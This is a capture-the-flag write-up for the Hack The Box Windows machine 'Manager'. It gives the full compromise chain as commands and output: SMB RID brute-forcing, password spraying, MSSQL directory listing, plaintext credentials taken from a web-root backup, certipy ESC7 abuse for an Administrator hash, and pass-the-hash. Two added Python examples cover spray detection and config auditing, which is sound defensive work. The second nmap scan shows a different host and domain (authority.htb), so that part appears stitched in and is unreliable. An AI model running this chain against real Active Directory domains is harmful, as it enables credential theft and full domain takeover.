Manager
Machine: Windows
Level: Medium
Nmap
└─# nmap -p- 10.10.11.236
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49687/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49726/tcp open unknown
54243/tcp open unknown
54436/tcp open unknown
└─# nmap -p 45,53,80,88,135,139,389,464,593,636,1433,3268,3269,5985,9389 -sC -sV 10.10.11.222
PORT STATE SERVICE VERSION
45/tcp closed mpm
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-25 18:16:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-25T18:17:33+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-25T18:17:34+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
1433/tcp closed ms-sql-s
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-25T18:17:33+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2023-10-25T18:17:34+00:00; +3h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-25T18:17:24
|_ start_date: N/A
|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s
User Access
Password Spraying → MSSQL
There is nothing interesting on the website, so try enumerating users over SMB with an empty password (null session).
└─# crackmapexec smb manager.htb -u anonymous -p "" --rid-brute
SMB manager.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB manager.htb 445 DC01 [+] manager.htb\anonymous:
SMB manager.htb 445 DC01 [+] Brute forcing RIDs
SMB manager.htb 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB manager.htb 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB manager.htb 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB manager.htb 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB manager.htb 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB manager.htb 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB manager.htb 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB manager.htb 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB manager.htb 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB manager.htb 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB manager.htb 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB manager.htb 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB manager.htb 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB manager.htb 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB manager.htb 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB manager.htb 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB manager.htb 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB manager.htb 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB manager.htb 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB manager.htb 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB manager.htb 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB manager.htb 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB manager.htb 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB manager.htb 445 DC01 1119: MANAGER\Operator (SidTypeUser)
Several user accounts show up here; save them and run a password spray. Since the earlier port scan showed both SMB and MSSQL open, spray against both services.
└─# crackmapexec smb 10.10.11.236 -u user.txt -p passwd.txt --no-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\Zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\JinWoo:jinWoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\ChinHaw:chinHaw
└─# crackmapexec mssql 10.10.11.236 -u user.txt -p passwd.txt --no-brute
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL 10.10.11.236 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL 10.10.11.236 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL 10.10.11.236 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL 10.10.11.236 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\Operator:operator
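From the defender's side, the spray above leaves a distinctive trace: one source address fails against many different accounts in a short window, then succeeds as one of them. The following is an added example (not part of the original writeup) that applies that rule to constructed logon records; the event tuples, source IPs and thresholds are my own assumptions, shaped like the fields a SIEM would extract from Windows events 4625/4624, and the usernames are the ones enumerated on this box.

```python
"""Password-spray detection over constructed logon records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, source IP, target account, result).
# The first five model the SMB spray in this writeup; the last two are a
# legitimate user who mistyped once and then logged in, which must not alert.
SAMPLE_EVENTS = [
    ("2023-10-25T18:20:01", "10.10.14.5", "Zhong",   "STATUS_LOGON_FAILURE"),
    ("2023-10-25T18:20:02", "10.10.14.5", "Cheng",   "STATUS_LOGON_FAILURE"),
    ("2023-10-25T18:20:03", "10.10.14.5", "Ryan",    "STATUS_LOGON_FAILURE"),
    ("2023-10-25T18:20:04", "10.10.14.5", "JinWoo",  "STATUS_LOGON_FAILURE"),
    ("2023-10-25T18:20:05", "10.10.14.5", "ChinHae", "SUCCESS"),
    ("2023-10-25T18:25:00", "10.10.14.9", "Raven",   "STATUS_LOGON_FAILURE"),
    ("2023-10-25T18:25:30", "10.10.14.9", "Raven",   "SUCCESS"),
]


def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Flag sources that fail logons against >= min_users distinct accounts
    within `window`. Returns {source: {"users": set, "success_after_spray": set}}.

    A per-account lockout rule misses sprays because each account sees only
    one failure; keying on distinct accounts per source catches them.
    """
    by_src = defaultdict(list)
    for ts, src, user, result in events:
        by_src[src].append((datetime.fromisoformat(ts), user, result))

    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        failures = [(t, u) for t, u, r in evs if r != "SUCCESS"]
        flagged, start = set(), 0
        for end in range(len(failures)):
            # Slide the window start forward so failures[start:end+1] spans <= window.
            while failures[end][0] - failures[start][0] > window:
                start += 1
            users = {u for _, u in failures[start:end + 1]}
            if len(users) >= min_users:
                flagged |= users
        if flagged:
            first_fail = failures[0][0]
            # Successful logons after the spray began: accounts to reset first.
            hits = {u for t, u, r in evs if r == "SUCCESS" and t >= first_fail}
            alerts[src] = {"users": flagged, "success_after_spray": hits}
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: sprayed {sorted(info['users'])}, "
              f"succeeded as {sorted(info['success_after_spray'])}")
```

The window and account-count thresholds are deliberately low for the sample; in production they are tuned against the normal failure rate, and the same logic applies to MSSQL login failures (the "Login failed" lines above) when those are forwarded to the SIEM.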
MSSQL Injection
Log in to the MSSQL service as Operator:operator. After some testing, xp_cmdshell cannot be executed with this account's permissions, but xp_dirtree works and can list directories. Looking through the output, there is a backup archive in the web root; download it from the website.
└─# impacket-mssqlclient manager.htb/Operator:operator@10.10.11.236 -windows-auth
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
Backup → raven
The archive contains a file, .old-conf.xml, which stores the raven account's login credentials.
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>[deleted]</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
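Two things make this file dangerous: the bind password is stored in clear text, and the client is configured for plain LDAP on 389 with the secure port disabled, so the same password also crosses the wire unencrypted. The following is an added example (not part of the original writeup) that audits an ldap-conf document for both conditions; the finding names are my own, and the embedded document is the page's file with the password replaced by a placeholder.

```python
"""Audit an LDAP client config recovered from a backup for credential exposure
(added example)."""
import xml.etree.ElementTree as ET

# The .old-conf.xml above, reproduced with the password replaced by a placeholder.
CONF_XML = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="false">0</secure-port>
    <search-base>dc=manager,dc=htb</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>raven@manager.htb</user>
      <password>PLACEHOLDER_PASSWORD</password>
    </access-user>
    <uid-attribute>cn</uid-attribute>
  </server>
</ldap-conf>"""


def audit_ldap_conf(xml_text):
    """Return a list of (finding, detail) tuples for one ldap-conf document.

    Finding names are assumptions of this example:
      plaintext-credential  - a non-empty <password> for the bind user
      cleartext-ldap-bind   - plain port enabled while the secure port is not
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for server in root.iter("server"):
        user = server.findtext("access-user/user", default="").strip()
        password = server.findtext("access-user/password", default="")
        if password.strip():
            # Any copy of this file (a zip in the web root, an old backup)
            # hands out a working domain account.
            findings.append(("plaintext-credential", user))

        open_port = server.find("open-port")
        secure_port = server.find("secure-port")
        plain_enabled = open_port is not None and open_port.get("enabled") == "true"
        tls_enabled = secure_port is not None and secure_port.get("enabled") == "true"
        if plain_enabled and not tls_enabled:
            # A simple bind over plain LDAP sends the password unencrypted.
            host = server.findtext("host", default="?")
            findings.append(("cleartext-ldap-bind", f"{host}:{open_port.text}"))
    return findings


if __name__ == "__main__":
    for finding, detail in audit_ldap_conf(CONF_XML):
        print(f"{finding}: {detail}")
```

The fix on the application side is to move the bind password out of the file (a secret store or a service account with a managed password), enable the secure port, and keep backup archives out of the web root entirely; the audit returns an empty list once the password is removed and the secure port is enabled.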
Root Access
Certipy → ESC7
Use certipy to look for exploitable ADCS certificate templates.
└─# certipy find -vulnerable -stdout -u raven -p '[deleted]' -dc-ip 10.10.11.236
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
The Raven user has dangerous permissions on the certificate authority (ESC7, vulnerable CA access control). Following Attack 2 from the referenced article, the root (Administrator) password hash can be obtained.
└─# certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@10.10.11.236 -password '[deleted]' -debug
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.236:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.10.11.236
[*] User 'Raven' already has officer rights on 'manager-DC01-CA'
└─# certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@10.10.11.236 -password '[deleted]'
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
└─# certipy req -username raven@10.10.11.236 -password '[deleted]' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htb
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) y
[*] Saved private key to 14.key
[-] Failed to request certificate
└─# certipy ca -ca 'manager-DC01-CA' -issue-request 14 -username raven@10.10.11.236 -password '[deleted]'
[*] Successfully issued certificate
└─# certipy req -username raven@10.10.11.236 -password '[deleted]' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 14
[*] Rerieving certificate with ID 14
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '14.key'
[*] Saved certificate and private key to 'administrator.pfx'
# sync the local clock with the server (Kerberos rejects requests when the clock skew is too large)
└─# ntpdate -s 10.10.11.236
└─# certipy auth -pfx ./administrator.pfx -dc-ip 10.10.11.236
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:[deleted]
Log in with the obtained credentials (pass-the-hash over WinRM).
└─# evil-winrm -i 10.10.11.236 -u administrator -H [deleted]
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
manager\administrator
Related article links